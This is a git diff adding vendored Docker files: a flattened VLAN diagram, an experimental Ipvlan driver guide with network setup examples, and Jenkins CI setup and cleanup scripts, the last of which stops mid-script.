index 0000000000..96cd21d52f --- /dev/null +++ b/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.svg @@ -0,0 +1 @@ +DockerHost:Frontend,Backend &CreditCardAppTiersareIsolatedbutcanstillcommunicateinsideinterfaceoranyotherDockerhostsusingtheparentVLANID802.1QTrunk -canbeasingleEthernetlinkorMultipleBondedEthernetlinksInterfaceeth0Container(s)Eth010.1.20.0/24Parent:eth0.20VLANID:20CreditCardsBackendContainer(s)Eth010.1.30.0/24Container(s)Eth010.1.10.0/24FrontendGateway10.1.20.1andothercontainersonthesameVLAN/subnetGateway10.1.10.1andothercontainersonthesameVLAN/subnetGateway10.1.30.1andothercontainersonthesameVLAN/subnet:Parenteth0.10VLANID:10Parent:eth0.30VLAN:30NetworkotherDockerHosts \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/vlan-networks.md b/vendor/github.com/docker/docker/experimental/vlan-networks.md new file mode 100644 index 0000000000..caec6d6c6b --- /dev/null +++ b/vendor/github.com/docker/docker/experimental/vlan-networks.md @@ -0,0 +1,471 @@ +# Ipvlan Network Driver + +### Getting Started + +The Ipvlan driver is currently in experimental mode in order to incubate Docker users use cases and vet the implementation to ensure a hardened, production ready driver in a future release. Libnetwork now gives users total control over both IPv4 and IPv6 addressing. The VLAN driver builds on top of that in giving operators complete control of layer 2 VLAN tagging and even Ipvlan L3 routing for users interested in underlay network integration. For overlay deployments that abstract away physical constraints see the [multi-host overlay ](https://docs.docker.com/engine/userguide/networking/get-started-overlay/) driver. + +Ipvlan is a new twist on the tried and true network virtualization technique. The Linux implementations are extremely lightweight because rather than using the traditional Linux bridge for isolation, they are simply associated to a Linux Ethernet interface or sub-interface to enforce separation between networks and connectivity to the physical network. + +Ipvlan offers a number of unique features and plenty of room for further innovations with the various modes. Two high level advantages of these approaches are, the positive performance implications of bypassing the Linux bridge and the simplicity of having less moving parts. Removing the bridge that traditionally resides in between the Docker host NIC and container interface leaves a very simple setup consisting of container interfaces, attached directly to the Docker host interface. This result is easy access for external facing services as there is no port mappings in these scenarios. + +### Pre-Requisites + +- The examples on this page are all single host and setup using Docker experimental builds that can be installed with the following instructions: [Install Docker experimental](https://github.com/docker/docker/tree/master/experimental) + +- All of the examples can be performed on a single host running Docker. Any examples using a sub-interface like `eth0.10` can be replaced with `eth0` or any other valid parent interface on the Docker host. Sub-interfaces with a `.` are created on the fly. `-o parent` interfaces can also be left out of the `docker network create` all together and the driver will create a `dummy` interface that will enable local host connectivity to perform the examples. + +- Kernel requirements: + + - To check your current kernel version, use `uname -r` to display your kernel version + - Ipvlan Linux kernel v4.2+ (support for earlier kernels exists but is buggy) + +### Ipvlan L2 Mode Example Usage + +The ipvlan `L2` mode example is like the following image. The driver is specified with `-d driver_name` option. In this case `-d ipvlan`. + +![Simple Ipvlan L2 Mode Example](images/ipvlan_l2_simple.png) + +The parent interface in the next example `-o parent=eth0` is configured as followed: + +``` +ip addr show eth0 +3: eth0: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 + inet 192.168.1.250/24 brd 192.168.1.255 scope global eth0 +``` + +Use the network from the host's interface as the `--subnet` in the `docker network create`. The container will be attached to the same network as the host interface as set via the `-o parent=` option. + +Create the ipvlan network and run a container attaching to it: + +``` +# Ipvlan (-o ipvlan_mode= Defaults to L2 mode if not specified) +docker network create -d ipvlan \ + --subnet=192.168.1.0/24 \ + --gateway=192.168.1.1 \ + -o ipvlan_mode=l2 \ + -o parent=eth0 db_net + +# Start a container on the db_net network +docker run --net=db_net -it --rm alpine /bin/sh + +# NOTE: the containers can NOT ping the underlying host interfaces as +# they are intentionally filtered by Linux for additional isolation. +``` + +The default mode for Ipvlan is `l2`. If `-o ipvlan_mode=` are left unspecified, the default mode will be used. Similarly, if the `--gateway` is left empty, the first usable address on the network will be set as the gateway. For example, if the subnet provided in the network create is `--subnet=192.168.1.0/24` then the gateway the container receives is `192.168.1.1`. + +To help understand how this mode interacts with other hosts, the following figure shows the same layer 2 segment between two Docker hosts that applies to and Ipvlan L2 mode. + +![Multiple Ipvlan Hosts](images/macvlan-bridge-ipvlan-l2.png) + +The following will create the exact same network as the network `db_net` created prior, with the driver defaults for `--gateway=192.168.1.1` and `-o ipvlan_mode=l2`. + +``` +# Ipvlan (-o ipvlan_mode= Defaults to L2 mode if not specified) +docker network create -d ipvlan \ + --subnet=192.168.1.0/24 \ + -o parent=eth0 db_net_ipv + +# Start a container with an explicit name in daemon mode +docker run --net=db_net_ipv --name=ipv1 -itd alpine /bin/sh + +# Start a second container and ping using the container name +# to see the docker included name resolution functionality +docker run --net=db_net_ipv --name=ipv2 -it --rm alpine /bin/sh +ping -c 4 ipv1 + +# NOTE: the containers can NOT ping the underlying host interfaces as +# they are intentionally filtered by Linux for additional isolation. +``` + +The drivers also support the `--internal` flag that will completely isolate containers on a network from any communications external to that network. Since network isolation is tightly coupled to the network's parent interface the result of leaving the `-o parent=` option off of a network create is the exact same as the `--internal` option. If the parent interface is not specified or the `--internal` flag is used, a netlink type `dummy` parent interface is created for the user and used as the parent interface effectively isolating the network completely. + +The following two `docker network create` examples result in identical networks that you can attach container to: + +``` +# Empty '-o parent=' creates an isolated network +docker network create -d ipvlan \ + --subnet=192.168.10.0/24 isolated1 + +# Explicit '--internal' flag is the same: +docker network create -d ipvlan \ + --subnet=192.168.11.0/24 --internal isolated2 + +# Even the '--subnet=' can be left empty and the default +# IPAM subnet of 172.18.0.0/16 will be assigned +docker network create -d ipvlan isolated3 + +docker run --net=isolated1 --name=cid1 -it --rm alpine /bin/sh +docker run --net=isolated2 --name=cid2 -it --rm alpine /bin/sh +docker run --net=isolated3 --name=cid3 -it --rm alpine /bin/sh + +# To attach to any use `docker exec` and start a shell +docker exec -it cid1 /bin/sh +docker exec -it cid2 /bin/sh +docker exec -it cid3 /bin/sh +``` + +### Ipvlan 802.1q Trunk L2 Mode Example Usage + +Architecturally, Ipvlan L2 mode trunking is the same as Macvlan with regard to gateways and L2 path isolation. There are nuances that can be advantageous for CAM table pressure in ToR switches, one MAC per port and MAC exhaustion on a host's parent NIC to name a few. The 802.1q trunk scenario looks the same. Both modes adhere to tagging standards and have seamless integration with the physical network for underlay integration and hardware vendor plugin integrations. + +Hosts on the same VLAN are typically on the same subnet and almost always are grouped together based on their security policy. In most scenarios, a multi-tier application is tiered into different subnets because the security profile of each process requires some form of isolation. For example, hosting your credit card processing on the same virtual network as the frontend webserver would be a regulatory compliance issue, along with circumventing the long standing best practice of layered defense in depth architectures. VLANs or the equivocal VNI (Virtual Network Identifier) when using the Overlay driver, are the first step in isolating tenant traffic. + +![Docker VLANs in Depth](images/vlans-deeper-look.png) + +The Linux sub-interface tagged with a vlan can either already exist or will be created when you call a `docker network create`. `docker network rm` will delete the sub-interface. Parent interfaces such as `eth0` are not deleted, only sub-interfaces with a netlink parent index > 0. + +For the driver to add/delete the vlan sub-interfaces the format needs to be `interface_name.vlan_tag`. Other sub-interface naming can be used as the specified parent, but the link will not be deleted automatically when `docker network rm` is invoked. + +The option to use either existing parent vlan sub-interfaces or let Docker manage them enables the user to either completely manage the Linux interfaces and networking or let Docker create and delete the Vlan parent sub-interfaces (netlink `ip link`) with no effort from the user. + +For example: `eth0.10` to denote a sub-interface of `eth0` tagged with vlan id `10`. The equivalent `ip link` command would be `ip link add link eth0 name eth0.10 type vlan id 10`. + +The example creates the vlan tagged networks and then start two containers to test connectivity between containers. Different Vlans cannot ping one another without a router routing between the two networks. The default namespace is not reachable per ipvlan design in order to isolate container namespaces from the underlying host. + +**Vlan ID 20** + +In the first network tagged and isolated by the Docker host, `eth0.20` is the parent interface tagged with vlan id `20` specified with `-o parent=eth0.20`. Other naming formats can be used, but the links need to be added and deleted manually using `ip link` or Linux configuration files. As long as the `-o parent` exists anything can be used if compliant with Linux netlink. + +``` +# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged +docker network create -d ipvlan \ + --subnet=192.168.20.0/24 \ + --gateway=192.168.20.1 \ + -o parent=eth0.20 ipvlan20 + +# in two separate terminals, start a Docker container and the containers can now ping one another. +docker run --net=ipvlan20 -it --name ivlan_test1 --rm alpine /bin/sh +docker run --net=ipvlan20 -it --name ivlan_test2 --rm alpine /bin/sh +``` + +**Vlan ID 30** + +In the second network, tagged and isolated by the Docker host, `eth0.30` is the parent interface tagged with vlan id `30` specified with `-o parent=eth0.30`. The `ipvlan_mode=` defaults to l2 mode `ipvlan_mode=l2`. It can also be explicitly set with the same result as shown in the next example. + +``` +# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged. +docker network create -d ipvlan \ + --subnet=192.168.30.0/24 \ + --gateway=192.168.30.1 \ + -o parent=eth0.30 \ + -o ipvlan_mode=l2 ipvlan30 + +# in two separate terminals, start a Docker container and the containers can now ping one another. +docker run --net=ipvlan30 -it --name ivlan_test3 --rm alpine /bin/sh +docker run --net=ipvlan30 -it --name ivlan_test4 --rm alpine /bin/sh +``` + +The gateway is set inside of the container as the default gateway. That gateway would typically be an external router on the network. + +``` +$ ip route + default via 192.168.30.1 dev eth0 + 192.168.30.0/24 dev eth0 src 192.168.30.2 +``` + +Example: Multi-Subnet Ipvlan L2 Mode starting two containers on the same subnet and pinging one another. In order for the `192.168.114.0/24` to reach `192.168.116.0/24` it requires an external router in L2 mode. L3 mode can route between subnets that share a common `-o parent=`. + +Secondary addresses on network routers are common as an address space becomes exhausted to add another secondary to a L3 vlan interface or commonly referred to as a "switched virtual interface" (SVI). + +``` +docker network create -d ipvlan \ + --subnet=192.168.114.0/24 --subnet=192.168.116.0/24 \ + --gateway=192.168.114.254 --gateway=192.168.116.254 \ + -o parent=eth0.114 \ + -o ipvlan_mode=l2 ipvlan114 + +docker run --net=ipvlan114 --ip=192.168.114.10 -it --rm alpine /bin/sh +docker run --net=ipvlan114 --ip=192.168.114.11 -it --rm alpine /bin/sh +``` + +A key takeaway is, operators have the ability to map their physical network into their virtual network for integrating containers into their environment with no operational overhauls required. NetOps simply drops an 802.1q trunk into the Docker host. That virtual link would be the `-o parent=` passed in the network creation. For untagged (non-VLAN) links, it is as simple as `-o parent=eth0` or for 802.1q trunks with VLAN IDs each network gets mapped to the corresponding VLAN/Subnet from the network. + +An example being, NetOps provides VLAN ID and the associated subnets for VLANs being passed on the Ethernet link to the Docker host server. Those values are simply plugged into the `docker network create` commands when provisioning the Docker networks. These are persistent configurations that are applied every time the Docker engine starts which alleviates having to manage often complex configuration files. The network interfaces can also be managed manually by being pre-created and docker networking will never modify them, simply use them as parent interfaces. Example mappings from NetOps to Docker network commands are as follows: + +- VLAN: 10, Subnet: 172.16.80.0/24, Gateway: 172.16.80.1 + + - `--subnet=172.16.80.0/24 --gateway=172.16.80.1 -o parent=eth0.10` + +- VLAN: 20, IP subnet: 172.16.50.0/22, Gateway: 172.16.50.1 + + - `--subnet=172.16.50.0/22 --gateway=172.16.50.1 -o parent=eth0.20 ` + +- VLAN: 30, Subnet: 10.1.100.0/16, Gateway: 10.1.100.1 + + - `--subnet=10.1.100.0/16 --gateway=10.1.100.1 -o parent=eth0.30` + +### IPVlan L3 Mode Example + +IPVlan will require routes to be distributed to each endpoint. The driver only builds the Ipvlan L3 mode port and attaches the container to the interface. Route distribution throughout a cluster is beyond the initial implementation of this single host scoped driver. In L3 mode, the Docker host is very similar to a router starting new networks in the container. They are on networks that the upstream network will not know about without route distribution. For those curious how Ipvlan L3 will fit into container networking see the following examples. + +![Docker Ipvlan L2 Mode](images/ipvlan-l3.png) + +Ipvlan L3 mode drops all broadcast and multicast traffic. This reason alone makes Ipvlan L3 mode a prime candidate for those looking for massive scale and predictable network integrations. It is predictable and in turn will lead to greater uptimes because there is no bridging involved. Bridging loops have been responsible for high profile outages that can be hard to pinpoint depending on the size of the failure domain. This is due to the cascading nature of BPDUs (Bridge Port Data Units) that are flooded throughout a broadcast domain (VLAN) to find and block topology loops. Eliminating bridging domains, or at the least, keeping them isolated to a pair of ToRs (top of rack switches) will reduce hard to troubleshoot bridging instabilities. Ipvlan L2 modes is well suited for isolated VLANs only trunked into a pair of ToRs that can provide a loop-free non-blocking fabric. The next step further is to route at the edge via Ipvlan L3 mode that reduces a failure domain to a local host only. + +- L3 mode needs to be on a separate subnet as the default namespace since it requires a netlink route in the default namespace pointing to the Ipvlan parent interface. + +- The parent interface used in this example is `eth0` and it is on the subnet `192.168.1.0/24`. Notice the `docker network` is **not** on the same subnet as `eth0`. + +- Unlike ipvlan l2 modes, different subnets/networks can ping one another as long as they share the same parent interface `-o parent=`. + +``` +ip a show eth0 +3: eth0: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 + link/ether 00:50:56:39:45:2e brd ff:ff:ff:ff:ff:ff + inet 192.168.1.250/24 brd 192.168.1.255 scope global eth0 +``` + +-A traditional gateway doesn't mean much to an L3 mode Ipvlan interface since there is no broadcast traffic allowed. Because of that, the container default gateway simply point the the containers `eth0` device. See below for CLI output of `ip route` or `ip -6 route` from inside an L3 container for details. + +The mode ` -o ipvlan_mode=l3` must be explicitly specified since the default ipvlan mode is `l2`. + +The following example does not specify a parent interface. The network drivers will create a dummy type link for the user rather then rejecting the network creation and isolating containers from only communicating with one another. + +``` +# Create the Ipvlan L3 network +docker network create -d ipvlan \ + --subnet=192.168.214.0/24 \ + --subnet=10.1.214.0/24 \ + -o ipvlan_mode=l3 ipnet210 + +# Test 192.168.214.0/24 connectivity +docker run --net=ipnet210 --ip=192.168.214.10 -itd alpine /bin/sh +docker run --net=ipnet210 --ip=10.1.214.10 -itd alpine /bin/sh + +# Test L3 connectivity from 10.1.214.0/24 to 192.168.212.0/24 +docker run --net=ipnet210 --ip=192.168.214.9 -it --rm alpine ping -c 2 10.1.214.10 + +# Test L3 connectivity from 192.168.212.0/24 to 10.1.214.0/24 +docker run --net=ipnet210 --ip=10.1.214.9 -it --rm alpine ping -c 2 192.168.214.10 + +``` + +Notice there is no `--gateway=` option in the network create. The field is ignored if one is specified `l3` mode. Take a look at the container routing table from inside of the container: + +``` +# Inside an L3 mode container +$ ip route + default dev eth0 + 192.168.120.0/24 dev eth0 src 192.168.120.2 +``` + +In order to ping the containers from a remote Docker host or the container be able to ping a remote host, the remote host or the physical network in between need to have a route pointing to the host IP address of the container's Docker host eth interface. More on this as we evolve the Ipvlan `L3` story. + +### Dual Stack IPv4 IPv6 Ipvlan L2 Mode + +- Not only does Libnetwork give you complete control over IPv4 addressing, but it also gives you total control over IPv6 addressing as well as feature parity between the two address families. + +- The next example will start with IPv6 only. Start two containers on the same VLAN `139` and ping one another. Since the IPv4 subnet is not specified, the default IPAM will provision a default IPv4 subnet. That subnet is isolated unless the upstream network is explicitly routing it on VLAN `139`. + +``` +# Create a v6 network +docker network create -d ipvlan \ + --subnet=2001:db8:abc2::/64 --gateway=2001:db8:abc2::22 \ + -o parent=eth0.139 v6ipvlan139 + +# Start a container on the network +docker run --net=v6ipvlan139 -it --rm alpine /bin/sh + +``` + +View the container eth0 interface and v6 routing table: + +``` + eth0@if55: mtu 1500 qdisc noqueue state UNKNOWN group default + link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff + inet 172.18.0.2/16 scope global eth0 + valid_lft forever preferred_lft forever + inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link + valid_lft forever preferred_lft forever + inet6 2001:db8:abc2::1/64 scope link nodad + valid_lft forever preferred_lft forever + +root@5c1dc74b1daa:/# ip -6 route +2001:db8:abc4::/64 dev eth0 proto kernel metric 256 +2001:db8:abc2::/64 dev eth0 proto kernel metric 256 +default via 2001:db8:abc2::22 dev eth0 metric 1024 +``` + +Start a second container and ping the first container's v6 address. + +``` +$ docker run --net=v6ipvlan139 -it --rm alpine /bin/sh + +root@b817e42fcc54:/# ip a show eth0 +75: eth0@if55: mtu 1500 qdisc noqueue state UNKNOWN group default + link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff + inet 172.18.0.3/16 scope global eth0 + valid_lft forever preferred_lft forever + inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link tentative dadfailed + valid_lft forever preferred_lft forever + inet6 2001:db8:abc2::2/64 scope link nodad + valid_lft forever preferred_lft forever + +root@b817e42fcc54:/# ping6 2001:db8:abc2::1 +PING 2001:db8:abc2::1 (2001:db8:abc2::1): 56 data bytes +64 bytes from 2001:db8:abc2::1%eth0: icmp_seq=0 ttl=64 time=0.044 ms +64 bytes from 2001:db8:abc2::1%eth0: icmp_seq=1 ttl=64 time=0.058 ms + +2 packets transmitted, 2 packets received, 0% packet loss +round-trip min/avg/max/stddev = 0.044/0.051/0.058/0.000 ms +``` + +The next example with setup a dual stack IPv4/IPv6 network with an example VLAN ID of `140`. + +Next create a network with two IPv4 subnets and one IPv6 subnets, all of which have explicit gateways: + +``` +docker network create -d ipvlan \ + --subnet=192.168.140.0/24 --subnet=192.168.142.0/24 \ + --gateway=192.168.140.1 --gateway=192.168.142.1 \ + --subnet=2001:db8:abc9::/64 --gateway=2001:db8:abc9::22 \ + -o parent=eth0.140 \ + -o ipvlan_mode=l2 ipvlan140 +``` + +Start a container and view eth0 and both v4 & v6 routing tables: + +``` +docker run --net=v6ipvlan139 --ip6=2001:db8:abc2::51 -it --rm alpine /bin/sh + +root@3cce0d3575f3:/# ip a show eth0 +78: eth0@if77: mtu 1500 qdisc noqueue state UNKNOWN group default + link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff + inet 192.168.140.2/24 scope global eth0 + valid_lft forever preferred_lft forever + inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link + valid_lft forever preferred_lft forever + inet6 2001:db8:abc9::1/64 scope link nodad + valid_lft forever preferred_lft forever + +root@3cce0d3575f3:/# ip route +default via 192.168.140.1 dev eth0 +192.168.140.0/24 dev eth0 proto kernel scope link src 192.168.140.2 + +root@3cce0d3575f3:/# ip -6 route +2001:db8:abc4::/64 dev eth0 proto kernel metric 256 +2001:db8:abc9::/64 dev eth0 proto kernel metric 256 +default via 2001:db8:abc9::22 dev eth0 metric 1024 +``` + +Start a second container with a specific `--ip4` address and ping the first host using IPv4 packets: + +``` +docker run --net=ipvlan140 --ip=192.168.140.10 -it --rm alpine /bin/sh +``` + +**Note**: Different subnets on the same parent interface in Ipvlan `L2` mode cannot ping one another. That requires a router to proxy-arp the requests with a secondary subnet. However, Ipvlan `L3` will route the unicast traffic between disparate subnets as long as they share the same `-o parent` parent link. + +### Dual Stack IPv4 IPv6 Ipvlan L3 Mode + +**Example:** IpVlan L3 Mode Dual Stack IPv4/IPv6, Multi-Subnet w/ 802.1q Vlan Tag:118 + +As in all of the examples, a tagged VLAN interface does not have to be used. The sub-interfaces can be swapped with `eth0`, `eth1`, `bond0` or any other valid interface on the host other then the `lo` loopback. + +The primary difference you will see is that L3 mode does not create a default route with a next-hop but rather sets a default route pointing to `dev eth` only since ARP/Broadcasts/Multicast are all filtered by Linux as per the design. Since the parent interface is essentially acting as a router, the parent interface IP and subnet needs to be different from the container networks. That is the opposite of bridge and L2 modes, which need to be on the same subnet (broadcast domain) in order to forward broadcast and multicast packets. + +``` +# Create an IPv6+IPv4 Dual Stack Ipvlan L3 network +# Gateways for both v4 and v6 are set to a dev e.g. 'default dev eth0' +docker network create -d ipvlan \ + --subnet=192.168.110.0/24 \ + --subnet=192.168.112.0/24 \ + --subnet=2001:db8:abc6::/64 \ + -o parent=eth0 \ + -o ipvlan_mode=l3 ipnet110 + + +# Start a few of containers on the network (ipnet110) +# in separate terminals and check connectivity +docker run --net=ipnet110 -it --rm alpine /bin/sh +# Start a second container specifying the v6 address +docker run --net=ipnet110 --ip6=2001:db8:abc6::10 -it --rm alpine /bin/sh +# Start a third specifying the IPv4 address +docker run --net=ipnet110 --ip=192.168.112.50 -it --rm alpine /bin/sh +# Start a 4th specifying both the IPv4 and IPv6 addresses +docker run --net=ipnet110 --ip6=2001:db8:abc6::50 --ip=192.168.112.50 -it --rm alpine /bin/sh +``` + +Interface and routing table outputs are as follows: + +``` +root@3a368b2a982e:/# ip a show eth0 +63: eth0@if59: mtu 1500 qdisc noqueue state UNKNOWN group default + link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff + inet 192.168.112.2/24 scope global eth0 + valid_lft forever preferred_lft forever + inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link + valid_lft forever preferred_lft forever + inet6 2001:db8:abc6::10/64 scope link nodad + valid_lft forever preferred_lft forever + +# Note the default route is simply the eth device because ARPs are filtered. +root@3a368b2a982e:/# ip route + default dev eth0 scope link + 192.168.112.0/24 dev eth0 proto kernel scope link src 192.168.112.2 + +root@3a368b2a982e:/# ip -6 route +2001:db8:abc4::/64 dev eth0 proto kernel metric 256 +2001:db8:abc6::/64 dev eth0 proto kernel metric 256 +default dev eth0 metric 1024 +``` + +*Note:* There may be a bug when specifying `--ip6=` addresses when you delete a container with a specified v6 address and then start a new container with the same v6 address it throws the following like the address isn't properly being released to the v6 pool. It will fail to unmount the container and be left dead. + +``` +docker: Error response from daemon: Address already in use. +``` + +### Manually Creating 802.1q Links + +**Vlan ID 40** + +If a user does not want the driver to create the vlan sub-interface it simply needs to exist prior to the `docker network create`. If you have sub-interface naming that is not `interface.vlan_id` it is honored in the `-o parent=` option again as long as the interface exists and us up. + +Links if manually created can be named anything you want. As long as the exist when the network is created that is all that matters. Manually created links do not get deleted regardless of the name when the network is deleted with `docker network rm`. + +``` +# create a new sub-interface tied to dot1q vlan 40 +ip link add link eth0 name eth0.40 type vlan id 40 + +# enable the new sub-interface +ip link set eth0.40 up + +# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged +docker network create -d ipvlan \ + --subnet=192.168.40.0/24 \ + --gateway=192.168.40.1 \ + -o parent=eth0.40 ipvlan40 + +# in two separate terminals, start a Docker container and the containers can now ping one another. +docker run --net=ipvlan40 -it --name ivlan_test5 --rm alpine /bin/sh +docker run --net=ipvlan40 -it --name ivlan_test6 --rm alpine /bin/sh +``` + +**Example:** Vlan sub-interface manually created with any name: + +``` +# create a new sub interface tied to dot1q vlan 40 +ip link add link eth0 name foo type vlan id 40 + +# enable the new sub-interface +ip link set foo up + +# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged +docker network create -d ipvlan \ + --subnet=192.168.40.0/24 --gateway=192.168.40.1 \ + -o parent=foo ipvlan40 + +# in two separate terminals, start a Docker container and the containers can now ping one another. +docker run --net=ipvlan40 -it --name ivlan_test5 --rm alpine /bin/sh +docker run --net=ipvlan40 -it --name ivlan_test6 --rm alpine /bin/sh +``` + +Manually created links can be cleaned up with: + +``` +ip link del foo +``` + +As with all of the Libnetwork drivers, they can be mixed and matched, even as far as running 3rd party ecosystem drivers in parallel for maximum flexibility to the Docker user. diff --git a/vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh b/vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh new file mode 100644 index 0000000000..662e2dcc37 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh @@ -0,0 +1,35 @@ +set +x +set +e + +echo "" +echo "" +echo "---" +echo "Now starting POST-BUILD steps" +echo "---" +echo "" + +echo INFO: Pointing to $DOCKER_HOST + +if [ ! $(docker ps -aq | wc -l) -eq 0 ]; then + echo INFO: Removing containers... + ! docker rm -vf $(docker ps -aq) +fi + +# Remove all images which don't have docker or debian in the name +if [ ! $(docker images | sed -n '1!p' | grep -v 'docker' | grep -v 'debian' | awk '{ print $3 }' | wc -l) -eq 0 ]; then + echo INFO: Removing images... + ! docker rmi -f $(docker images | sed -n '1!p' | grep -v 'docker' | grep -v 'debian' | awk '{ print $3 }') +fi + +# Kill off any instances of git, go and docker, just in case +! taskkill -F -IM git.exe -T >& /dev/null +! taskkill -F -IM go.exe -T >& /dev/null +! taskkill -F -IM docker.exe -T >& /dev/null + +# Remove everything +! cd /c/jenkins/gopath/src/github.com/docker/docker +! rm -rfd * >& /dev/null +! rm -rfd .* >& /dev/null + +echo INFO: Cleanup complete +exit 0 \ No newline at end of file diff --git a/vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh b/vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh new file mode 100644 index 0000000000..30e5884d97 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh @@ -0,0 +1,309 @@ +# Jenkins CI script for Windows to Linux CI. +# Heavily modified by John Howard (@jhowardmsft) December 2015 to try to make it more reliable. +set +xe +SCRIPT_VER="Wed Apr 20 18:30:19 UTC 2016" + +# TODO to make (even) more resilient: +# - Wait for daemon to be running before executing docker commands +# - Check if jq is installed +# - Make sure bash is v4.3 or later. Can't do until all Azure nodes on the latest version +# - Make sure we are not running as local system. Can't do until all Azure nodes are updated. +# - Error if docker versions are not equal. Can't do until all Azure nodes are updated +# - Error if go versions are not equal. Can't do until all Azure nodes are updated. +# - Error if running 32-bit posix tools. Probably can take from bash --version and check contains "x86_64" +# - Warn if the CI directory cannot be deleted afterwards. Otherwise turdlets are left behind +# - Use %systemdrive% ($SYSTEMDRIVE) rather than hard code to c: for TEMP +# - Consider cross builing the Windows binary and copy across. That's a bit of a heavy lift. Only reason +# for doing that is that it mirrors the actual release process for docker.exe which is cross-built. +# However, should absolutely not be a problem if built natively, so nit-picking. +# - Tidy up of images and containers. Either here, or in the teardown script. + +ec=0 +uniques=1 +echo INFO: Started at `date`. Script version $SCRIPT_VER + + +# !README! +# There are two daemons running on the remote Linux host: +# - outer: specified by DOCKER_HOST, this is the daemon that will build and run the inner docker daemon +# from the sources matching the PR. +# - inner: runs on the host network, on a port number similar to that of DOCKER_HOST but the last two digits are inverted +# (2357 if DOCKER_HOST had port 2375; and 2367 if DOCKER_HOST had port 2376). +# The windows integration tests are run against this inner daemon. + +# get the ip, inner and outer ports. +ip="${DOCKER_HOST#*://}" +port_outer="${ip#*:}" +# inner port is like outer port with last two digits inverted. +port_inner=$(echo "$port_outer" | sed -E 's/(.)(.)$/\2\1/') +ip="${ip%%:*}" + +echo "INFO: IP=$ip PORT_OUTER=$port_outer PORT_INNER=$port_inner" + +# If TLS is enabled +if [ -n "$DOCKER_TLS_VERIFY" ]; then + protocol=https + if [ -z "$DOCKER_MACHINE_NAME" ]; then + ec=1 + echo "ERROR: DOCKER_MACHINE_NAME is undefined" + fi + certs=$(echo ~/.docker/machine/machines/$DOCKER_MACHINE_NAME) + curlopts="--cacert $certs/ca.pem --cert $certs/cert.pem --key $certs/key.pem" + run_extra_args="-v tlscerts:/etc/docker" + daemon_extra_args="--tlsverify --tlscacert /etc/docker/ca.pem --tlscert /etc/docker/server.pem --tlskey /etc/docker/server-key.pem" +else + protocol=http +fi + +# Save for use by make.sh and scripts it invokes +export MAIN_DOCKER_HOST="tcp://$ip:$port_inner" + +# Verify we can get the remote node to respond to _ping +if [ $ec -eq 0 ]; then + reply=`curl -s $curlopts $protocol://$ip:$port_outer/_ping` + if [ "$reply" != "OK" ]; then + ec=1 + echo "ERROR: Failed to get an 'OK' response from the docker daemon on the Linux node" + echo " at $ip:$port_outer when called with an http request for '_ping'. This implies that" + echo " either the daemon has crashed/is not running, or the Linux node is unavailable." + echo + echo " A regular ping to the remote Linux node is below. It should reply. If not, the" + echo " machine cannot be reached at all and may have crashed. If it does reply, it is" + echo " likely a case of the Linux daemon not running or having crashed, which requires" + echo " further investigation." + echo + echo " Try re-running this CI job, or ask on #docker-dev or #docker-maintainers" + echo " for someone to perform further diagnostics, or take this node out of rotation." + echo + ping $ip + else + echo "INFO: The Linux nodes outer daemon replied to a ping. Good!" + fi +fi + +# Get the version from the remote node. Note this may fail if jq is not installed. +# That's probably worth checking to make sure, just in case. +if [ $ec -eq 0 ]; then + remoteVersion=`curl -s $curlopts $protocol://$ip:$port_outer/version | jq -c '.Version'` + echo "INFO: Remote daemon is running docker version $remoteVersion" +fi + +# Compare versions. We should really fail if result is no 1. Output at end of script. +if [ $ec -eq 0 ]; then + uniques=`docker version | grep Version | /usr/bin/sort -u | wc -l` +fi + +# Make sure we are in repo +if [ $ec -eq 0 ]; then + if [ ! -d hack ]; then + echo "ERROR: Are you sure this is being launched from a the root of docker repository?" + echo " If this is a Windows CI machine, it should be c:\jenkins\gopath\src\github.com\docker\docker." + echo " Current directory is `pwd`" + ec=1 + fi +fi + +# Are we in split binary mode? +if [ `grep DOCKER_CLIENTONLY Makefile | wc -l` -gt 0 ]; then + splitBinary=0 + echo "INFO: Running in single binary mode" +else + splitBinary=1 + echo "INFO: Running in split binary mode" +fi + + +# Get the commit has and verify we have something +if [ $ec -eq 0 ]; then + export COMMITHASH=$(git rev-parse --short HEAD) + echo INFO: Commmit hash is $COMMITHASH + if [ -z $COMMITHASH ]; then + echo "ERROR: Failed to get commit hash. Are you sure this is a docker repository?" + ec=1 + fi +fi + +# Redirect to a temporary location. Check is here for local runs from Jenkins machines just in case not +# in the right directory where the repo is cloned. We also redirect TEMP to not use the environment +# TEMP as when running as a standard user (not local system), it otherwise exposes a bug in posix tar which +# will cause CI to fail from Windows to Linux. Obviously it's not best practice to ever run as local system... +if [ $ec -eq 0 ]; then + export TEMP=/c/CI/CI-$COMMITHASH + export TMP=$TEMP + /usr/bin/mkdir -p $TEMP # Make sure Linux mkdir for -p +fi + +# Tidy up time +if [ $ec -eq 0 ]; then + echo INFO: Deleting pre-existing containers and images... + + # Force remove all containers based on a previously built image with this commit + ! docker rm -f $(docker ps -aq --filter "ancestor=docker:$COMMITHASH") &>/dev/null + + # Force remove any container with this commithash as a name + ! docker rm -f $(docker ps -aq --filter "name=docker-$COMMITHASH") &>/dev/null + + # This SHOULD never happen, but just in case, also blow away any containers + # that might be around. + ! if [ ! $(docker ps -aq | wc -l) -eq 0 ]; then + echo WARN: There were some 